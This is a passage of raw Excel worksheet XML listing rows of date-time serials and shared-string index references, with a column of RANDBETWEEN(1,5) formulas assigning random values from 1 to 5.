        <v>144</v>
      </c>
      <c r="E8793" t="s">
        <v>7820</v>
      </c>
      <c r="F8793">
        <f t="shared" ca="1" si="137"/>
        <v>5</v>
      </c>
    </row>
    <row r="8794" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8794" s="1">
        <v>43377.763599537036</v>
      </c>
      <c r="C8794" t="s">
        <v>140</v>
      </c>
      <c r="D8794" t="s">
        <v>847</v>
      </c>
      <c r="E8794" s="2" t="s">
        <v>7821</v>
      </c>
      <c r="F8794">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8795" s="1">
        <v>43377.739444444444</v>
      </c>
      <c r="C8795" t="s">
        <v>10</v>
      </c>
      <c r="D8795" t="s">
        <v>6</v>
      </c>
      <c r="E8795" t="s">
        <v>7822</v>
      </c>
      <c r="F8795">
        <f t="shared" ca="1" si="137"/>
        <v>3</v>
      </c>
    </row>
    <row r="8796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8796" s="1">
        <v>43377.71912037037</v>
      </c>
      <c r="C8796" t="s">
        <v>144</v>
      </c>
      <c r="E8796" t="s">
        <v>7823</v>
      </c>
      <c r="F8796">
        <f t="shared" ca="1" si="137"/>
        <v>1</v>
      </c>
    </row>
    <row r="8797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8797" s="1">
        <v>43377.711759259262</v>
      </c>
      <c r="C8797" t="s">
        <v>10</v>
      </c>
      <c r="D8797" t="s">
        <v>36</v>
      </c>
      <c r="E8797" t="s">
        <v>7824</v>
      </c>
      <c r="F8797">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8798" s="1">
        <v>43377.692546296297</v>
      </c>
      <c r="C8798" t="s">
        <v>10</v>
      </c>
      <c r="D8798" t="s">
        <v>112</v>
      </c>
      <c r="E8798" t="s">
        <v>7825</v>
      </c>
      <c r="F8798">
        <f t="shared" ca="1" si="137"/>
        <v>3</v>
      </c>
    </row>
    <row r="8799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8799" s="1">
        <v>43377.69121527778</v>
      </c>
      <c r="C8799" t="s">
        <v>10</v>
      </c>
      <c r="D8799" t="s">
        <v>112</v>
      </c>
      <c r="F8799">
        <f t="shared" ca="1" si="137"/>
        <v>1</v>
      </c>
    </row>
    <row r="8800" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8800" s="1">
        <v>43377.671967592592</v>
      </c>
      <c r="C8800" t="s">
        <v>10</v>
      </c>
      <c r="D8800" t="s">
        <v>52</v>
      </c>
      <c r="E8800" s="2" t="s">
        <v>7826</v>
      </c>
      <c r="F8800">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8801" s="1">
        <v>43377.671388888892</v>
      </c>
      <c r="C8801" t="s">
        <v>10</v>
      </c>
      <c r="D8801" t="s">
        <v>192</v>
      </c>
      <c r="E8801" t="s">
        <v>7827</v>
      </c>
      <c r="F8801">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8802" s="1">
        <v>43377.666898148149</v>
      </c>
      <c r="C8802" t="s">
        <v>10</v>
      </c>
      <c r="D8802" t="s">
        <v>222</v>
      </c>
      <c r="E8802" t="s">
        <v>7828</v>
      </c>
      <c r="F8802">
        <f t="shared" ca="1" si="137"/>
        <v>3</v>
      </c>
    </row>
    <row r="8803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8803" s="1">
        <v>43377.666886574072</v>
      </c>
      <c r="C8803" t="s">
        <v>10</v>
      </c>
      <c r="D8803" t="s">
        <v>222</v>
      </c>
      <c r="E8803" t="s">
        <v>7828</v>
      </c>
      <c r="F8803">
        <f t="shared" ca="1" si="137"/>
        <v>2</v>
      </c>
    </row>
    <row r="8804" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8804" s="1">
        <v>43377.646724537037</v>
      </c>
      <c r="C8804" t="s">
        <v>16</v>
      </c>
      <c r="E8804" t="s">
        <v>7829</v>
      </c>
      <c r="F8804">
        <f t="shared" ca="1" si="137"/>
        <v>5</v>
      </c>
    </row>
    <row r="8805" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8805" s="1">
        <v>43377.620208333334</v>
      </c>
      <c r="C8805" t="s">
        <v>10</v>
      </c>
      <c r="D8805" t="s">
        <v>6</v>
      </c>
      <c r="E8805" t="s">
        <v>7830</v>
      </c>
      <c r="F8805">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8806" s="1">
        <v>43377.611516203702</v>
      </c>
      <c r="C8806" t="s">
        <v>10</v>
      </c>
      <c r="D8806" t="s">
        <v>222</v>
      </c>
      <c r="E8806" t="s">
        <v>7831</v>
      </c>
      <c r="F8806">
        <f t="shared" ca="1" si="137"/>
        <v>5</v>
      </c>
    </row>
    <row r="8807" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A8807" s="1">
        <v>43377.591215277775</v>
      </c>
      <c r="C8807" t="s">
        <v>6</v>
      </c>
      <c r="D8807" t="s">
        <v>25</v>
      </c>
      <c r="E8807" s="2" t="s">
        <v>7832</v>
      </c>
      <c r="F8807">
        <f t="shared" ca="1" si="137"/>
        <v>2</v>
      </c>
    </row>
    <row r="8808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8808" s="1">
        <v>43377.579965277779</v>
      </c>
      <c r="C8808" t="s">
        <v>71</v>
      </c>
      <c r="E8808" t="s">
        <v>7833</v>
      </c>
      <c r="F8808">
        <f t="shared" ca="1" si="137"/>
        <v>1</v>
      </c>
    </row>
    <row r="8809" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8809" s="1">
        <v>43377.579884259256</v>
      </c>
      <c r="C8809" t="s">
        <v>10</v>
      </c>
      <c r="D8809" t="s">
        <v>36</v>
      </c>
      <c r="E8809" t="s">
        <v>7834</v>
      </c>
      <c r="F8809">
        <f t="shared" ca="1" si="137"/>
        <v>5</v>
      </c>
    </row>
    <row r="8810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8810" s="1">
        <v>43377.560671296298</v>
      </c>
      <c r="C8810" t="s">
        <v>10</v>
      </c>
      <c r="D8810" t="s">
        <v>36</v>
      </c>
      <c r="E8810" t="s">
        <v>7835</v>
      </c>
      <c r="F8810">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8811" s="1">
        <v>43377.540266203701</v>
      </c>
      <c r="C8811" t="s">
        <v>10</v>
      </c>
      <c r="D8811" t="s">
        <v>20</v>
      </c>
      <c r="E8811" t="s">
        <v>7836</v>
      </c>
      <c r="F8811">
        <f t="shared" ca="1" si="137"/>
        <v>2</v>
      </c>
    </row>
    <row r="8812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8812" s="1">
        <v>43377.520046296297</v>
      </c>
      <c r="C8812" t="s">
        <v>10</v>
      </c>
      <c r="D8812" t="s">
        <v>86</v>
      </c>
      <c r="E8812" t="s">
        <v>7837</v>
      </c>
      <c r="F8812">
        <f t="shared" ca="1" si="137"/>
        <v>3</v>
      </c>
    </row>
    <row r="8813" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8813" s="1">
        <v>43377.51871527778</v>
      </c>
      <c r="C8813" t="s">
        <v>10</v>
      </c>
      <c r="D8813" t="s">
        <v>89</v>
      </c>
      <c r="E8813" t="s">
        <v>7838</v>
      </c>
      <c r="F8813">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8814" s="1">
        <v>43377.500069444446</v>
      </c>
      <c r="C8814" t="s">
        <v>10</v>
      </c>
      <c r="D8814" t="s">
        <v>158</v>
      </c>
      <c r="E8814" t="s">
        <v>7839</v>
      </c>
      <c r="F8814">
        <f t="shared" ca="1" si="137"/>
        <v>5</v>
      </c>
    </row>
    <row r="8815" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8815" s="1">
        <v>43377.485173611109</v>
      </c>
      <c r="C8815" t="s">
        <v>65</v>
      </c>
      <c r="E8815" s="2" t="s">
        <v>7840</v>
      </c>
      <c r="F8815">
        <f t="shared" ca="1" si="137"/>
        <v>1</v>
      </c>
    </row>
    <row r="8816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8816" s="1">
        <v>43377.477835648147</v>
      </c>
      <c r="C8816" t="s">
        <v>10</v>
      </c>
      <c r="D8816" t="s">
        <v>80</v>
      </c>
      <c r="E8816" t="s">
        <v>7841</v>
      </c>
      <c r="F8816">
        <f t="shared" ca="1" si="137"/>
        <v>1</v>
      </c>
    </row>
    <row r="8817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8817" s="1">
        <v>43377.466886574075</v>
      </c>
      <c r="C8817" t="s">
        <v>10</v>
      </c>
      <c r="D8817" t="s">
        <v>251</v>
      </c>
      <c r="E8817" t="s">
        <v>7842</v>
      </c>
      <c r="F8817">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8818" s="1">
        <v>43377.462708333333</v>
      </c>
      <c r="C8818" t="s">
        <v>10</v>
      </c>
      <c r="D8818" t="s">
        <v>112</v>
      </c>
      <c r="E8818" t="s">
        <v>7843</v>
      </c>
      <c r="F8818">
        <f t="shared" ca="1" si="137"/>
        <v>5</v>
      </c>
    </row>
    <row r="8819" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A8819" s="1">
        <v>43377.452951388892</v>
      </c>
      <c r="C8819" t="s">
        <v>65</v>
      </c>
      <c r="D8819" t="s">
        <v>312</v>
      </c>
      <c r="E8819" s="2" t="s">
        <v>7844</v>
      </c>
      <c r="F8819">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8820" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A8820" s="1">
        <v>43377.446886574071</v>
      </c>
      <c r="C8820" t="s">
        <v>10</v>
      </c>
      <c r="D8820" t="s">
        <v>381</v>
      </c>
      <c r="E8820" s="2" t="s">
        <v>7845</v>
      </c>
      <c r="F8820">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8821" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A8821" s="1">
        <v>43377.440787037034</v>
      </c>
      <c r="C8821" t="s">
        <v>10</v>
      </c>
      <c r="D8821" t="s">
        <v>6</v>
      </c>
      <c r="E8821" s="2" t="s">
        <v>7846</v>
      </c>
      <c r="F8821">
        <f t="shared" ca="1" si="137"/>
        <v>5</v>
      </c>
    </row>
    <row r="8822" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A8822" s="1">
        <v>43377.417025462964</v>
      </c>
      <c r="C8822" t="s">
        <v>50</v>
      </c>
      <c r="D8822" t="s">
        <v>312</v>
      </c>
      <c r="E8822" s="2" t="s">
        <v>7847</v>
      </c>
      <c r="F8822">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8823" s="1">
        <v>43377.416319444441</v>
      </c>
      <c r="C8823" t="s">
        <v>10</v>
      </c>
      <c r="D8823" t="s">
        <v>23</v>
      </c>
      <c r="E8823" t="s">
        <v>7848</v>
      </c>
      <c r="F8823">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8824" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8824" s="1">
        <v>43377.412939814814</v>
      </c>
      <c r="C8824" t="s">
        <v>10</v>
      </c>
      <c r="D8824" t="s">
        <v>36</v>
      </c>
      <c r="E8824" t="s">
        <v>7849</v>
      </c>
      <c r="F8824">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8825" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8825" s="1">
        <v>43377.402546296296</v>
      </c>
      <c r="C8825" t="s">
        <v>10</v>
      </c>
      <c r="D8825" t="s">
        <v>178</v>
      </c>
      <c r="E8825" t="s">
        <v>7850</v>
      </c>
      <c r="F8825">
        <f t="shared" ca="1" si="137"/>
        <v>1</v>
      </c>
    </row>
    <row r="8826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8826" s="1">
        <v>43377.396539351852</v>
      </c>
      <c r="C8826" t="s">
        <v>10</v>
      </c>
      <c r="D8826" t="s">
        <v>52</v>
      </c>
      <c r="E8826" t="s">
        <v>7851</v>
      </c>
      <c r="F8826">
        <f t="shared" ca="1" si="137"/>
        <v>5</v>
      </c>
    </row>
    <row r="8827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8827" s="1">
        <v>43377.395046296297</v>
      </c>
      <c r="C8827" t="s">
        <v>10</v>
      </c>
      <c r="D8827" t="s">
        <v>80</v>
      </c>
      <c r="E8827" t="s">
        <v>7852</v>
      </c>
      <c r="F8827">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8828" s="1">
        <v>43377.365069444444</v>
      </c>
      <c r="C8828" t="s">
        <v>41</v>
      </c>
      <c r="E8828" t="s">
        <v>7853</v>
      </c>
      <c r="F8828">
        <f t="shared" ca="1" si="137"/>
        <v>5</v>
      </c>
    </row>
    <row r="8829" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A8829" s="1">
        <v>43377.348333333335</v>
      </c>
      <c r="C8829" t="s">
        <v>471</v>
      </c>
      <c r="E8829" s="2" t="s">
        <v>7854</v>
      </c>
      <c r="F8829">
        <f t="shared" ca="1" si="137"/>
        <v>1</v>
      </c>
    </row>
    <row r="8830" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8830" s="1">
        <v>43377.347662037035</v>
      </c>
      <c r="C8830" t="s">
        <v>48</v>
      </c>
      <c r="E8830" s="2" t="s">
        <v>7855</v>
      </c>
      <c r="F8830">
        <f t="shared" ca="1" si="137"/>
        <v>2</v>
      </c>
    </row>
    <row r="8831" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8831" s="1">
        <v>43377.318032407406</v>
      </c>
      <c r="C8831" t="s">
        <v>10</v>
      </c>
      <c r="D8831" t="s">
        <v>271</v>
      </c>
      <c r="E8831" s="2" t="s">
        <v>7856</v>
      </c>
      <c r="F8831">
        <f t="shared" ca="1" si="137"/>
        <v>3</v>
      </c>
    </row>
    <row r="8832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8832" s="1">
        <v>43377.301886574074</v>
      </c>
      <c r="C8832" t="s">
        <v>65</v>
      </c>
      <c r="E8832" t="s">
        <v>7857</v>
      </c>
      <c r="F8832">
        <f t="shared" ca="1" si="137"/>
        <v>1</v>
      </c>
    </row>
    <row r="8833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8833" s="1">
        <v>43377.287685185183</v>
      </c>
      <c r="C8833" t="s">
        <v>330</v>
      </c>
      <c r="D8833" t="s">
        <v>2139</v>
      </c>
      <c r="E8833" t="s">
        <v>6838</v>
      </c>
      <c r="F8833">
        <f t="shared" ca="1" si="137"/>
        <v>4</v>
      </c>
    </row>
    <row r="8834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8834" s="1">
        <v>43377.280011574076</v>
      </c>
      <c r="C8834" t="s">
        <v>45</v>
      </c>
      <c r="E8834" t="s">
        <v>7858</v>
      </c>
      <c r="F8834">
        <f t="shared" ref="F8834:F8897" ca="1" si="138">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="8835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8835" s="1">
        <v>43377.279097222221</v>
      </c>
      <c r="C8835" t="s">
        <v>253</v>
      </c>
      <c r="E8835" t="s">
        <v>7859</v>
      </c>
      <c r="F8835">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8836" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8836" s="1">
        <v>43377.268171296295</v>
      </c>
      <c r="C8836" t="s">
        <v>41</v>
      </c>
      <c r="E8836" s="2" t="s">
        <v>7860</v>
      </c>
      <c r="F8836">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8837" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A8837" s="1">
        <v>43377.253495370373</v>
      </c>
      <c r="C8837" t="s">
        <v>328</v>
      </c>
      <c r="D8837" t="s">
        <v>312</v>
      </c>
      <c r="E8837" s="2" t="s">
        <v>7861</v>
      </c>
      <c r="F8837">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8838" s="1">
        <v>43377.227152777778</v>
      </c>
      <c r="C8838" t="s">
        <v>124</v>
      </c>
      <c r="E8838" t="s">
        <v>7862</v>
      </c>
      <c r="F8838">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8839" s="1">
        <v>43377.218321759261</v>
      </c>
      <c r="C8839" t="s">
        <v>41</v>
      </c>
      <c r="E8839" t="s">
        <v>7863</v>
      </c>
      <c r="F8839">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8840" s="1">
        <v>43377.217013888891</v>
      </c>
      <c r="C8840" t="s">
        <v>97</v>
      </c>
      <c r="E8840" t="s">
        <v>7864</v>
      </c>
      <c r="F8840">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8841" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8841" s="1">
        <v>43377.199016203704</v>
      </c>
      <c r="C8841" t="s">
        <v>41</v>
      </c>
      <c r="E8841" s="2" t="s">
        <v>7865</v>
      </c>
      <c r="F8841">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8842" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8842" s="1">
        <v>43377.144733796296</v>
      </c>
      <c r="C8842" t="s">
        <v>29</v>
      </c>
      <c r="D8842" t="s">
        <v>312</v>
      </c>
      <c r="E8842" s="2" t="s">
        <v>7866</v>
      </c>
      <c r="F8842">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8843" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8843" s="1">
        <v>43377.137060185189</v>
      </c>
      <c r="C8843" t="s">
        <v>319</v>
      </c>
      <c r="D8843" t="s">
        <v>7867</v>
      </c>
      <c r="E8843" s="2" t="s">
        <v>7868</v>
      </c>
      <c r="F8843">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8844" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A8844" s="1">
        <v>43377.131527777776</v>
      </c>
      <c r="C8844" t="s">
        <v>124</v>
      </c>
      <c r="E8844" s="2" t="s">
        <v>7869</v>
      </c>
      <c r="F8844">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8845" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8845" s="1">
        <v>43377.128159722219</v>
      </c>
      <c r="C8845" t="s">
        <v>463</v>
      </c>
      <c r="E8845" t="s">
        <v>7870</v>
      </c>
      <c r="F8845">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8846" s="1">
        <v>43377.091550925928</v>
      </c>
      <c r="C8846" t="s">
        <v>319</v>
      </c>
      <c r="D8846" t="s">
        <v>320</v>
      </c>
      <c r="F8846">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8847" s="1">
        <v>43377.047500000001</v>
      </c>
      <c r="C8847" t="s">
        <v>140</v>
      </c>
      <c r="D8847" t="s">
        <v>847</v>
      </c>
      <c r="E8847" t="s">
        <v>7871</v>
      </c>
      <c r="F8847">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8848" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8848" s="1">
        <v>43376.963136574072</v>
      </c>
      <c r="C8848" t="s">
        <v>720</v>
      </c>
      <c r="E8848" s="2" t="s">
        <v>7872</v>
      </c>
      <c r="F8848">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8849" s="1">
        <v>43376.929224537038</v>
      </c>
      <c r="C8849" t="s">
        <v>1050</v>
      </c>
      <c r="E8849" t="s">
        <v>7873</v>
      </c>
      <c r="F8849">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8850" s="1">
        <v>43376.815625000003</v>
      </c>
      <c r="C8850" t="s">
        <v>10</v>
      </c>
      <c r="D8850" t="s">
        <v>6</v>
      </c>
      <c r="F8850">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8851" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A8851" s="1">
        <v>43376.785543981481</v>
      </c>
      <c r="C8851" t="s">
        <v>10</v>
      </c>
      <c r="D8851" t="s">
        <v>17</v>
      </c>
      <c r="E8851" s="2" t="s">
        <v>7874</v>
      </c>
      <c r="F8851">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8852" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A8852" s="1">
        <v>43376.728645833333</v>
      </c>
      <c r="C8852" t="s">
        <v>10</v>
      </c>
      <c r="D8852" t="s">
        <v>1160</v>
      </c>
      <c r="E8852" s="2" t="s">
        <v>7875</v>
      </c>
      <c r="F8852">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8853" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A8853" s="1">
        <v>43376.728055555555</v>
      </c>
      <c r="C8853" t="s">
        <v>10</v>
      </c>
      <c r="D8853" t="s">
        <v>192</v>
      </c>
      <c r="E8853" s="2" t="s">
        <v>7876</v>
      </c>
      <c r="F8853">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8854" s="1">
        <v>43376.727453703701</v>
      </c>
      <c r="C8854" t="s">
        <v>10</v>
      </c>
      <c r="E8854" t="s">
        <v>7877</v>
      </c>
      <c r="F8854">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8855" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8855" s="1">
        <v>43376.719189814816</v>
      </c>
      <c r="C8855" t="s">
        <v>10</v>
      </c>
      <c r="D8855" t="s">
        <v>17</v>
      </c>
      <c r="E8855" t="s">
        <v>7878</v>
      </c>
      <c r="F8855">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8856" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8856" s="1">
        <v>43376.650104166663</v>
      </c>
      <c r="C8856" t="s">
        <v>10</v>
      </c>
      <c r="D8856" t="s">
        <v>336</v>
      </c>
      <c r="E8856" t="s">
        <v>7879</v>
      </c>
      <c r="F8856">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8857" s="1">
        <v>43376.634409722225</v>
      </c>
      <c r="C8857" t="s">
        <v>6</v>
      </c>
      <c r="D8857" t="s">
        <v>25</v>
      </c>
      <c r="E8857" t="s">
        <v>7880</v>
      </c>
      <c r="F8857">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8858" s="1">
        <v>43376.632581018515</v>
      </c>
      <c r="C8858" t="s">
        <v>10</v>
      </c>
      <c r="D8858" t="s">
        <v>86</v>
      </c>
      <c r="E8858" t="s">
        <v>7881</v>
      </c>
      <c r="F8858">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8859" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8859" s="1">
        <v>43376.623645833337</v>
      </c>
      <c r="C8859" t="s">
        <v>10</v>
      </c>
      <c r="D8859" t="s">
        <v>20</v>
      </c>
      <c r="E8859" t="s">
        <v>7882</v>
      </c>
      <c r="F8859">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8860" s="1">
        <v>43376.623645833337</v>
      </c>
      <c r="C8860" t="s">
        <v>10</v>
      </c>
      <c r="D8860" t="s">
        <v>20</v>
      </c>
      <c r="E8860" t="s">
        <v>7882</v>
      </c>
      <c r="F8860">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8861" s="1">
        <v>43376.623541666668</v>
      </c>
      <c r="C8861" t="s">
        <v>10</v>
      </c>
      <c r="D8861" t="s">
        <v>20</v>
      </c>
      <c r="E8861" t="s">
        <v>7883</v>
      </c>
      <c r="F8861">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8862" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8862" s="1">
        <v>43376.622870370367</v>
      </c>
      <c r="C8862" t="s">
        <v>10</v>
      </c>
      <c r="D8862" t="s">
        <v>112</v>
      </c>
      <c r="E8862" t="s">
        <v>7884</v>
      </c>
      <c r="F8862">
        <f t="shared" ca="1" si="138"/>
        <v>4</v>
      </c>
    </row>
    <row r="8863" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8863" s="1">
        <v>43376.622812499998</v>
      </c>
      <c r="C8863" t="s">
        <v>10</v>
      </c>
      <c r="D8863" t="s">
        <v>6</v>
      </c>
      <c r="E8863" t="s">
        <v>7885</v>
      </c>
      <c r="F8863">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8864" s="1">
        <v>43376.614745370367</v>
      </c>
      <c r="C8864" t="s">
        <v>10</v>
      </c>
      <c r="D8864" t="s">
        <v>80</v>
      </c>
      <c r="E8864" t="s">
        <v>7886</v>
      </c>
      <c r="F8864">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8865" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8865" s="1">
        <v>43376.614699074074</v>
      </c>
      <c r="C8865" t="s">
        <v>6</v>
      </c>
      <c r="D8865" t="s">
        <v>25</v>
      </c>
      <c r="E8865" t="s">
        <v>7887</v>
      </c>
      <c r="F8865">
        <f t="shared" ca="1" si="138"/>
        <v>3</v>
      </c>
    </row>
    <row r="8866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8866" s="1">
        <v>43376.60355324074</v>
      </c>
      <c r="C8866" t="s">
        <v>10</v>
      </c>
      <c r="D8866" t="s">
        <v>158</v>
      </c>
      <c r="E8866" t="s">
        <v>7888</v>
      </c>
      <c r="F8866">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8867" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8867" s="1">
        <v>43376.551458333335</v>
      </c>
      <c r="C8867" t="s">
        <v>10</v>
      </c>
      <c r="D8867" t="s">
        <v>192</v>
      </c>
      <c r="E8867" t="s">
        <v>7889</v>
      </c>
      <c r="F8867">
        <f t="shared" ca="1" si="138"/>
        <v>2</v>
      </c>
    </row>
    <row r="8868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8868" s="1">
        <v>43376.537280092591</v>
      </c>
      <c r="C8868" t="s">
        <v>189</v>
      </c>
      <c r="E8868" t="s">
        <v>7890</v>
      </c>
      <c r="F8868">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8869" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A8869" s="1">
        <v>43376.520543981482</v>
      </c>
      <c r="C8869" t="s">
        <v>344</v>
      </c>
      <c r="E8869" s="2" t="s">
        <v>7891</v>
      </c>
      <c r="F8869">
        <f t="shared" ca="1" si="138"/>
        <v>1</v>
      </c>
    </row>
    <row r="8870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8870" s="1">
        <v>43376.518553240741</v>
      </c>
      <c r="C8870" t="s">
        <v>10</v>
      </c>
      <c r="D8870" t="s">
        <v>36</v>
      </c>
      <c r="E8870" t="s">
        <v>7892</v>
      </c>
      <c r="F8870">
        <f t="shared" ca="1" si="138"/>
        <v>5</v>
      </c>
    </row>
    <row r="8871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8871" s="1">
